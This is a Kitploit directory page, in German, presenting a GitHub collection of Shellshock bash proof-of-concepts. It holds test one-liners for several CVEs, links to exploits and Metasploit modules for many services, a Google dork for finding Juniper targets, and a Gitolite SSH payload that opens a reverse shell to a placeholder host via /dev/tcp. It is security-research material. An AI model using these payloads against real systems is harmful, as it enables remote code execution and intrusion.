Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
shellshocker-pocs — Sammlung von Proof of Concepts und potenziellen Zielen für #ShellShocker | Kitploit
Tools/GitHubGitHub/mubix/shellshocker-pocs
SchwachstellenscannerSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsKuratierte Ressourcen
GitHubmubix/shellshocker-pocs

shellshocker-pocs

Sammlung von Proof of Concepts und potenziellen Zielen für #ShellShocker

Repository anzeigen
8891905vor 6 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Shellshocker - Repository mit Proof-of-Concept-Code für „Shellshock“

Sammlung von Proof-of-Concepts und potenziellen Zielen für #ShellShocker

Wikipedia-Link: https://en.wikipedia.org/wiki/Shellshock_%28software_bug%29#CVE-2014-7186_and_CVE-2014-7187_Details

Bitte reiche einen Pull-Request ein, wenn du weitere Links oder andere Ressourcen hast.

Spekulation:(Nicht bestätigt, möglicherweise verwundbar)

  • XMPP(ejabberd)
  • Mailman - als nicht verwundbar bestätigt
  • MySQL
  • NFS
  • Bind9
  • Procmail siehe
  • Exim siehe
  • Juniper Google-Suche inurl:inurl:/dana-na/auth/url_default/welcome.cgi
    • via: https://twitter.com/notsosecure/status/516132301025984512
    • via: http://kb.juniper.net/InfoCenter/index?page=content&id=JSA10648&actp=RSS
  • Cisco-Geräte
    • via: http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash
  • FreePB / Asterix hier gepatcht
  • Wenn du PoCs für eine dieser Anwendungen kennst, reiche bitte ein Issue oder einen Pull-Request mit einem Link ein.

    Kommandozeile (Linux, OSX und Windows über Cygwin)

    • bashcheck - Skript zum Testen auf die neuesten Schwachstellen

    CVE-2014-6271

    • env X='() { :; }; echo "CVE-2014-6271 vulnerable"' bash -c id

    CVE-2014-7169

    Erstellt bei Verwundbarkeit eine Datei namens „echo“ im aktuellen Arbeitsverzeichnis, die das Datum enthält.

    • env X='() { (a)=>\' bash -c "echo date"; cat echo

    CVE-2014-7186

    • bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' || echo "CVE-2014-7186 vulnerable, redir_stack"

    CVE-2014-7187

    • (for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | bash || echo "CVE-2014-7187 vulnerable, word_lineno"

    CVE-2014-6278

    • env X='() { _; } >_[$($())] { echo CVE-2014-6278 vulnerable; id; }' bash -c :
    • Weitere Informationen: http://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html

    CVE-2014-6277

    führt bei Verwundbarkeit zu einem Segfault

    • env X='() { x() { _; }; x() { _; } <<a; }' bash -c :
    • Weitere Diskussion auf fulldisclosure: http://seclists.org/fulldisclosure/2014/Oct/9
    • Weitere Informationen: http://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html

    IBM z/OS -

    • http://mainframed767.tumblr.com/post/98446455927/bad-news-is-it-totally-works-in-bash-on-z-os-and

    HTTP

    • Metasploit-Exploit-Modul - Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
    • Metasploit-Exploit-Modul - Advantech Switch Bash Environment Variable Code Injection (Shellshock)
    • Metasploit-Exploit-Modul - IPFire Bash Environment Variable Injection (Shellshock)
    • HTTP-Header-Polution von @irsdl - http://pastebin.com/QNkf7dYS
    • HTTP CGI-BIN - http://pastebin.com/166f8Rjx
    • cPanel - http://blog.sucuri.net/2014/09/bash-vulnerability-shell-shock-thousands-of-cpanel-sites-are-high-risk.html
    • Digital Alert Systems DASDEC - http://seclists.org/fulldisclosure/2014/Sep/107
    • F5 - https://twitter.com/securifybv/status/515035044294172673
      • https://twitter.com/securifybv/status/515035044294172673/photo/1
      • https://twitter.com/avalidnerd/status/515056463589675008
        • https://twitter.com/avalidnerd/status/515056463589675008/photo/1
    • Invisiblethreat.ca - https://www.invisiblethreat.ca/2014/09/cve-2014-6271/
    • Kommandozeilen-Version - https://gist.github.com/mfadzilr/70892f43597e7863a8dc
    • User-Agent-basiertes Walkthrough mit LiveHTTPHeaders - http://www.lykostech.net/lab-time-exploiting-shellshock-bash-bug-virtual-server/
    • User-Agent-basiertes Walkthrough mit Burp - http://oleaass.com/shellshock-proof-of-concept-reverse-shell/
    • User-Agent-basiert, unterstützt aber Tor und Socks5 (Python) - https://github.com/lnxg33k/misc/blob/master/shellshock.py
    • User-Agent-basiert in Ruby - https://github.com/securusglobal/BadBash
    • Einfacher Header-basierter Scanner mit Sleep- und Multithread-Unterstützung - https://github.com/gry/shellshock-scanner
    • shocker - Prüft eine Liste von URLs in einer Datei oder eine einzelne URL gegen eine Liste bekannter verwundbarer CGI-Ressourcen (Content-Type-Methode)
    • Xymon - https://lists.xymon.com/archive/2014-September/040350.html
    • QNAP - https://www.exploit-db.com/exploits/36503

    Phusion Passenger

    • https://news.ycombinator.com/item?id=8369776

    DHCP

    • Trusted-Sec-Exploitation über Tftpd32 - https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/
    • Metasploit-Exploit-Modul - Dhclient Bash Environment Variable Injection (Shellshock)
    • Metasploit-Auxiliary-Modul - https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/dhclient_bash_env.rb
    • Perl-Skript - http://pastebin.com/S1WVzTv9
    • Verwendung einer Wi-Fi-Pineapple, um Personen zum Beitritt zum Netzwerk zu zwingen - http://d.uijn.nl/?p=32

    SSH

    • Stack Overflow - http://unix.stackexchange.com/questions/157477/how-can-shellshock-be-exploited-over-ssh
    • SSH ForcedCommand - https://twitter.com/JZdziarski/status/515205581226123264
      • https://twitter.com/JZdziarski/status/515205581226123264/photo/1
    • SendEnv: LC_X='() { :; }; echo vulnerable' ssh [email protected] -o SendEnv=LC_X
    • Gitolite - https://twitter.com/Grifo/status/515089986161766400
      • $ ssh GITOLITEUSER@VULNERABLEIP '() { ignore;}; /bin/bash -i >& /dev/tcp/REVERSESHELLIP/PORT 0>&1'
      • (Voraussetzung ist ein Git-Konto auf dem Server)

    OSX

    • Privilegieneskalation über VMware Fusion - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/osx/local/vmware_bash_function_root.rb
    • Behebung: http://support.apple.com/kb/DL1769

    OSX - mit Reverse-DNS (CVE-2014-3671.txt)

    • Beispiel-Zonendatei: in-addr.arpa, die ein CVE-2014-6271-Beispiel enthält.
    • Beispieldatei mit einem getnameinfo(), das an setenv() übergibt: osx-rev-ptr.c
    • Advisory mit Beschreibung des Obigen CVE-2014-3671.txt

    SIP

    • SIP-Proxys: https://github.com/zaf/sipshock

    Qmail

    • Detaillierte Anleitung - http://marc.info/?l=qmail&m=141183309314366&w=2
    • Tweet von @ymzkei5 - http://twitter.com/ymzkei5/status/515328039765307392
      • http://twitpic.com/ec3615
      • http://twitpic.com/ec361o

    Postfix

    • http://packetstormsecurity.com/files/128572/postfixsmtp-shellshock.txt

    FTP

    • Pure-FTPd: https://gist.github.com/jedisct1/88c62ee34e6fa92c31dc
    • Metasploit-Exploit-Modul - Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)

    OpenVPN

    • OpenVPN - https://news.ycombinator.com/item?id=8385332
    • PoC-Walkthrough von @fj33r - http://sprunge.us/BGjP

    Oracle

    • Alert und Liste betroffener Produkte

    TMNT

    • https://twitter.com/SynAckPwn/status/514961810320293888/photo/1

    Hand

    • Über @DJManilaIce - http://pastie.org/9601055
    root@kitploit:~
    user@localhost:~$ env X='() { (a)=>\' /bin/bash -c "shellshocker echo -e \"           __ __\n          /  V  \ \n     _    |  |   |\n    / \   |  |   |\n    |  |  |  |   |\n    |  |  |  |   |\n    |  |__|  |   |\n    |  |  \  |___|___\n    |  \   |/        \ \n    |   |  |______    |\n    |   |  |          |\n    |   \__'   /     |\n    \        \(     /\n     \             /\n      \|            |\n\""; cat shellshocker
    /bin/bash: X: line 1: syntax error near unexpected token `='
    /bin/bash: X: line 1: `'
    /bin/bash: error importing function definition for `X'
               __ __
              /  V  \ 
         _    |  |   |
        / \   |  |   |
        |  |  |  |   |
        |  |  |  |   |
        |  |__|  |   |
        |  |  \  |___|___
        |  \   |/        \ 
        |   |  |______    |
        |   |  |          |
        |   \__'   /     |
        \        \(     /
         \             /
          \|            |
    
    

    CUPS

    • Metasploit-Exploit-Modul - CUPS Filter Bash Environment Variable Code Injection

    IRC

    • Metasploit-Exploit-Modul - Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution
    • Metasploit-Exploit-Modul - Legend Perl IRC Bot Remote Code Execution

    Skripte von @primalsec

    • shell_shocker.py - Gut geeignet, um mit einer bekannten verwundbaren URL zu interagieren und Befehle zu übermitteln (User-Agent-Methode)
    • w3af_shocker.py - Automatisiert den Ablauf eines w3af-Spider-/shell_shock-Scans (User-Agent-Methode)
    • shell_sprayer.py - Prüft eine Liste von URLs in einer Datei oder eine einzelne URL gegen eine bekannte Liste von cgi-bin-Ressourcen (User-Agent-Methode)
    Tool herunterladen